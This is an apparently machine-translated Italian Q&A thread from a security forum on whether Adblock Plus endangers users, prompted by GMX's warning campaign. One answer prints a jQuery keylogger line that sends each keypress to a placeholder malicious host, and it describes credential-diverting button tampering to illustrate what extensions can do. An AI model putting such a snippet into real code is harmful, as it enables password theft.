Adblock (Plus) è un rischio per la sicurezza?

165

Il sito web del mio provider di posta elettronica ( http://www.gmx.de ) ha recentemente avviato il collegamento al sito (tedesco) http://www.browsersicherheit.info/ che sostanzialmente afferma che a causa delle sue capacità di modificare l'aspetto di un sito, Adblock Plus (e altri) potrebbe essere abusato per phishing. Ecco una citazione da quel sito più la sua traduzione:

Solche Add-ons haben Zugriff auf alle Ihre Eingaben im Browser und können diese auch an Dritte weitergeben – auch Ihr Bank-Passwort. Dies kann auf allen Web-Seiten passieren. Sicherheitsmechanismen wie SSL können das nicht verhindern.

tradotto:

Such addons can access all your browser's input and can also forward them to third parties - even your banking password. This can happen on all websites. Security mechanisms such as SSL cannot avoid that.

Ok, menzionano altri add-on (ovviamente ovviamente crapware), ma Adblock Plus è davvero una minaccia per la sicurezza o gli operatori di quel sito usano semplicemente l'opportunità di provare a spaventare gli utenti inesperti a visualizzare di nuovo i loro annunci?

    
posta Tobias Kienzler 27.02.2014 - 08:25
fonte

9 risposte

218

Non lo è. Questo è un FUD ( paura, incertezza e dubbio ) campagna di GMX perché vogliono mostrare i loro annunci. Non vi è assolutamente alcun rischio per la sicurezza da parte degli adepti. Hanno aggiunto un po 'di crapware all'elenco per renderlo più legittimo.

Ovviamente queste campagne sono molto insolite, specialmente da un'azienda così grande e famosa come GMX. Sfortunatamente, non ho una fonte inglese a portata di mano (perché è una campagna tedesca) ma dal momento che parli tedesco potresti voler leggere questo articolo su heise.de .

Aggiornamento n. 1: United Internet, la società dietro GMX, ha ricevuto molte critiche per i clienti ingannevoli affermando falsamente che esiste un rischio per la sicurezza sul proprio PC. Wall Street Journal (edizione tedesca) denominato gli avvisi visualizzati su GMX e il sito che collegano a una "campagna di paura".

Aggiornamento n. 2: GMX ora dice che non visualizzeranno più il collegamento quando si utilizzano i blocchi degli annunci ma lo visualizzeranno comunque se si utilizza il crapware che inietta gli annunci, l'elenco nel sito http://www.browsersicherheit.info/ è stato aggiornato di conseguenza e ora elenca solo una piccola raccolta di crapware. Questo elenco non è completo, quindi non è una fonte attendibile quando si desidera sapere se il proprio browser ha installato crapware. Tuttavia, United Internet mantiene ancora la sua posizione che non vuole che gli utenti che visitano i loro siti utilizzino i blocchi degli annunci e affermano che svilupperanno altri metodi anti-blocco in futuro ( origine tedesca ).

    
risposta data 27.02.2014 - 10:57
fonte
105

Aggiorna

Dopo aver riflettuto su questo, devo concordare con le altre risposte in quanto, nonostante il fatto che possa accedere ai tuoi dati, Adblock è più probabile che protegga la tua privacy piuttosto che invaderlo. Il vero il rischio sono annunci dannosi che richiedono di installare software sul computer. Adblock impedisce questi.

Di seguito è riportata la risposta cautelativa originale:

Sì, lo è completamente.

Adblock Plus è un'estensione / componente aggiuntivo del browser sviluppata da uno sviluppatore indipendente. Adblock può accedere al DOM (modello oggetto documento) su tutte le pagine.

Il modo in cui AdBlock funziona è che inietta lo script nel browser, che ricerca nel DOM e quindi esegue una funzione hide() su ciò che determina sono gli annunci.

Ciò significa che AdBlock (e qualsiasi estensione di Chrome con tale autorizzazione) può accedere al DOM. Adblock non può accedere alle variabili JavaScript.

Che cosa significa?

Se sei su un sito web con autenticazione sicura e c'è un oggetto JavaScript con qualcosa di privato come un AuthKey, sei sicuro . AdBlock non può accedere alle variabili JavaScript.

Tuttavia, AdBlock può eseguire codice equivalente a questo.

$(window).onKeyPress(function(e){$('html').append('<img src='http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode)})

Che essenzialmente instraderà qualsiasi tasto premuto su un server remoto.

Questo può essere usato per rubare la tua password che è anche peggio di rubare il tuo token.

Detto questo, è AdBlock stesso pericoloso?

Mi sembra che AdBlock non sia eccessivamente pericoloso in quanto lo sviluppatore si è identificato ed è utilizzato da milioni di persone. Se stava facendo il tipo di ingannevolezza come sopra, qualcuno avrebbe probabilmente notato e fischiato.

Ma non pensare che le estensioni di Chrome siano totalmente sicure. Tutti loro possono rubare dati, così come altre cose malevole.

Che altro può fare?

Un'estensione di Chrome può anche eseguire le seguenti violazioni di sicurezza in modo abbastanza banale ...

  • Instradare il contenuto di qualsiasi e-mail o pagina che leggi su una fonte di terze parti (se questa e-mail contiene informazioni di accesso non crittografate, sei sballato) Se puoi vederlo sullo schermo, così può qualsiasi estensione di Chrome, senza fare domande .
  • Inserisci le informazioni in un campo e premi il pulsante di invio, ad esempio, invia una e-mail
  • Se lasci il browser aperto e l'estensione sa come, può utilizzare la tua interfaccia email (Gmail, Outlook) per inviare e-mail di sua scelta ai tuoi contatti. Questo è banale.
  • Cambia lo script associato a qualsiasi pulsante, se originariamente era stato inserito in jQuery. Ad esempio, il pulsante che invia le informazioni di accesso al server può essere leggermente modificato per inviare tali informazioni sia al server che a http://mymaliciousserver . Questo è banale.

Aggiornamento

È stato verificato attraverso la discussione che AdBlock è open source. Questo dovrebbe farti avere più fiducia in AdBlock, ma ricorda che è ancora capace di fare quelle cose. Ho esaminato la fonte e posso tranquillamente dire che non ho idea di cosa stia succedendo.

Fonte: sono uno sviluppatore JavaScript e estensione Chrome.

    
risposta data 27.02.2014 - 17:14
fonte
53

Questo in realtà si riduce a un problema di fiducia. È vero che oggi l'estensione AdBlock è sicura. Sappiamo che non ruberà i tuoi dati, anche se, come sottolineano le altre risposte , ha le caratteristiche tecniche capacità di farlo.

Tuttavia, le estensioni di Chrome sono silenziose e aggiornate automaticamente.

Ti fidi che lo sviluppatore dell'estensione AdBlock non aggiungerà codice dannoso? Io personalmente faccio - con milioni di utenti, il codice malevolo sarebbe notato rapidamente e sarebbe senza dubbio un killer della carriera per lo sviluppatore.

Anche se ti fidi dello sviluppatore, ci sono ancora scenari improbabili che potrebbero esporti:

Per il paranoico, questi problemi potrebbero essere mitigati da:

Quindi, mentre è intellettualmente disonesto dire "no, non c'è rischio", il rischio è completamente superato da GMX. Proprio come mi fido di Google per darmi un browser che non ruba i miei dati personali, mi fido dello sviluppatore AdBlock per darmi un'estensione che non mi rubi i dati.

Il rischio che l'estensione venga aggiornata con codice malevolo è abbastanza piccolo che non mi preoccupo e, se ho il minimo timore, è abbastanza semplice disabilitare l'estensione.

    
risposta data 27.02.2014 - 21:21
fonte
42

Tutti i software rappresentano un rischio per la sicurezza, ma in questo caso la loro affermazione è fuorviante.

Proprio come tutti i consigli sono potenzialmente cattivi e tutte le transazioni sono potenzialmente fraudolente. "Rischio" significa solo che la tua sicurezza non è garantita, come nel 100% dei casi.

Tuttavia, nel caso di AdBlock Plus, il software è ben compreso e sviluppato da un team che ha una comprovata esperienza nel proteggere gli interessi dei suoi utenti. Inoltre è open-source, quindi il codice sorgente è disponibile per permetterti di esaminare te stesso per eventuali problemi di sicurezza. Quindi, in questo caso, il rischio è minimo; anche banale.

Invece, GMX sta usando un truismo ("il software è sempre rischioso") per suggerire che il questo software è pericoloso, che è fuorviante al meglio, e forse diffamatorio. È come un proprietario del ristorante che distribuisce volantini che dicono che i suoi concorrenti potrebbero avvelenare il proprio cibo. Tecnicamente è vero, dal momento che hai detto "potrebbe essere" invece di "sono", ma l'azione è fondamentalmente disonesta.

    
risposta data 27.02.2014 - 23:41
fonte
20

Solo un'osservazione - Io tendo a promuovere gli ad blocker in particolare per i miei amici e colleghi meno esperti - proprio perché riduce le minacce alla sicurezza. Come? Poiché molti dei contenuti più dannosi sul Web si presentano sotto forma di pubblicità ingannevole come "fai clic qui per rendere il tuo PC più veloce" ... Questi in gran parte spariscono con un blocco annunci.

    
risposta data 28.02.2014 - 03:47
fonte
9

Adblock (come altre estensioni e, se è per questo, sviluppatori di browser) ha la capacità tecnica di ottenere molti dei tuoi dati, e tu hai tutti i rischi comunemente associati all'esecuzione di applicazioni di terze parti - ovvero, che il venditore può essere malizioso e potrebbero esserci dei bug nel loro software che infrangono la sicurezza.

Detto questo, considero AdBlock come una difesa contro il phishing. Un sacco di software discutibile viene spinto agli utenti attraverso annunci mascherati da qualcos'altro - cioè, un sito offre alcuni elementi che un l'utente desidera, ma ha un annuncio che assomiglia a un pulsante di download e fornisce alcuni prodotti adware / malware al posto del contenuto effettivo sul sito e tali malware "accidentalmente" scaricati rappresentano un serio rischio per la sicurezza. Allo stesso modo, ci sono stati episodi di attacchi da parte dei consumatori di massa eseguendo un banner pubblicitario contenente un exploit zeroday, che avrebbe portato l'exploit a comparire su siti rispettati e ben fidati.

Per le pratiche di sicurezza a livello aziendale, può avere senso richiedere AdBlock e installarlo di default su ogni workstation, poiché è particolarmente utile per proteggere gli utenti inesperti che non lo installerebbero da soli. Ciò causerebbe un rischio fidandosi di un altro prodotto software, ma sarebbe un netto positivo per la sicurezza di tutti i giorni.

    
risposta data 27.02.2014 - 20:17
fonte
8

Il modo in cui queste informazioni vengono diffuse da United Internet è fuorviante (sto tentando di evitare di dire "diffamazione"). L'affermazione così com'è è chiaramente sbagliata da tutti i mezzi oggettivi, e la presentazione è diffamatoria.

Naturalmente, in linea di principio, si deve ammettere che Adblock (Plus) è ovviamente un rischio di sicurezza potenziale . Se questo rischio giustifica una preoccupazione ragionevole è un'altra cosa.

Adblock (Plus) potrebbe essere un rischio per la sicurezza per tre motivi:

  1. È un software che gira sul tuo computer, che potrebbe , come tutti i software, in linea di principio fa quasi tutto. Incluso mostrando informazioni false o rubando i tuoi dati.
  2. modifica i contenuti della pagina web, questo è ciò che riguarda gli annunci bloccanti. Certamente, un software che è ben noto per modificare i contenuti delle pagine web potrebbe modificare i contenuti in modo malevolo e passare inosservato molto più facilmente di un altro software.
  3. Esegue questa operazione abbinando un elenco scaricabile di espressioni regolari da una gamma di terze parti (non controllate / sconosciute), come EasyList

Quindi, se sei in modalità ultra-paranoia, potresti temere che qualcuno all'EasyList (o un altro fornitore dell'elenco filtri) modifichi l'elenco dei filtri in modo che facciano qualcosa di malevolo, o un hacker dirotta il sito. L'addon di Adblock Plus presumibilmente scaricherà l'elenco dannoso durante l'aggiornamento giornaliero / settimanale senza conoscere e senza mezzi di verifica (è possibile incorporare un checksum, ma questo protegge solo dalla corruzione accidentale, non dalle modifiche dannose).
Di conseguenza, una tale lista di blocchi dannosi potrebbe in teoria causare l'addon a fare "cose malvagie".

Fortunatamente, a parte gli exploit di JS, non ci sono troppi danni che realisticamente possono essere fatti tramite questo vettore di attacco a causa del modo in cui Adblock funziona (corrisponderà a un'espressione regolare arbitraria, ma > non farà sospensioni arbitrarie, quindi nascondere alcuni elementi che non dovrebbe nascondere o lasciare che alcune pubblicità siano il caso peggiore possibile).
D'altra parte, un exploit JS potrebbe essere utilizzato contro di te senza che Adblock Plus funzioni in primo luogo.

Inoltre, ovviamente, come qualsiasi software di terze parti (incluso Firefox o Chrome stesso!) il componente aggiuntivo Adblock Plus potrebbe rubare i tuoi dati. Tutto quello che puoi dire al momento è che finora non è mai successo .
Poi di nuovo, quasi tutti i grandi attori commerciali del business stanno facendo cose non affidabili su base giornaliera, a cui nessuno si oppone.

Ora devi chiederti quanto è probabile che Adblock Plus effettivamente rubi i dati degli utenti e quanto sia probabile che una cosa del genere non venga rilevata per più di un giorno o due in un progetto open source ampiamente distribuito.

Francamente, se ritieni che si tratti di una minaccia seria e realistica che potrebbe influire su di te, allora devi anche credere che la Microsoft in collaborazione con la NSA sviluppi già funzionalità di furto d'identità in Windows e che ogni computer ha un "kill switch" segreto che il Dipartimento della Difesa statunitense può attivare a piacimento (anche questo è in linea di principio possibile, ed è più probabile in realtà essere vero dell'autore di Adblock che ruba i tuoi risparmi).

In questo caso non ti dovresti fidare di GMX, dal momento che (nota la dicitura, sarà , non potrebbe ) condividere tutti i tuoi dati personali e informazioni sul traffico in modo malevolo e non etico con altre parti (almeno con le agenzie statunitensi, a causa del trattato di Schröder del 2001, ma non si può sapere con chi altro).
Inoltre non dovresti fidarti di 1 & 1 (un altro membro di United Internet) perché condividerà i tuoi dati personali con who-knows-who (essendo una società con sede negli Stati Uniti). Né Google, né l'altra metà di Internet per questo.

D'altra parte, Adblock Plus ha dimostrato in modo dimostrabile che previene il malware da installare sui computer degli utenti in passato.

    
risposta data 28.02.2014 - 13:59
fonte
3

Le altre risposte dimenticano di menzionare il problema oltre alla fiducia: questo adblock modifica le pagine che visiti. Questo e doversi fidare di più sviluppatori è il motivo per cui non ho mai usato software di blocco degli annunci / plug-in del browser e consiglio vivamente di non farlo.

È noto che i siti Web dipendono da tutti i tipi di invarianti fragili per la sicurezza. Ad esempio, basta guardare ai modi in cui il clickjacking è stato risolto in passato. Non c'è nulla che impedisca ad adblock di violare erroneamente un'invarianza di cui il sito dipende per sicurezza.

Anche adblock e altri software di blocco degli annunci riducono l'anonimato. Un avversario può farti eseguire codice per esplorare l'albero DOM e cercare parti mancanti / alterazioni, oppure osservare passivamente che non stai facendo certe richieste per recuperare contenuti correlati agli annunci (alcuni dei quali possono essere ospitati sul sito stesso, rendendolo un possibile avversario).

    
risposta data 02.03.2014 - 00:46
fonte
2

Qualcosa che nessuno ha menzionato qui è che Adblock plus, insieme a quasi tutti gli altri browser ed estensioni, può essere aggiornato da remoto. Questo significa che ci deve essere una backdoor nel programma anche se è bloccata su specifici URL di aggiornamento "affidabili". Questo potrebbe essere interpretato come spyware, ma lo spyware è un termine un po 'astratto.

È vero che la maggior parte delle persone ha affermato che non è sicuro poiché dispone delle autorizzazioni per leggere e inviare dati, sebbene sia ampiamente accettato che Adblock plus, in particolare, non sia dannoso. Nonostante la maggior parte sia open source (Adblock incluso), le estensioni e il software del browser sono sicuri quanto gli URL di aggiornamento per i quali non c'è modo di sapere quanto siano sicuri in quanto il codice per questi servizi è remoto e quindi non accessibile.

Ovviamente nessun software o server può essere sicuro al 100% a causa dell'entropia e degli utenti, ma per ottenere la massima sicurezza possibile è necessario studiare il codice sorgente, creare sempre dalla sorgente e disabilitare l'aggiornamento automatico. Come con tutti i software, i browser e le estensioni sono sicuri quanto l'utente.

    
risposta data 06.03.2014 - 09:20
fonte

Leggi altre domande sui tag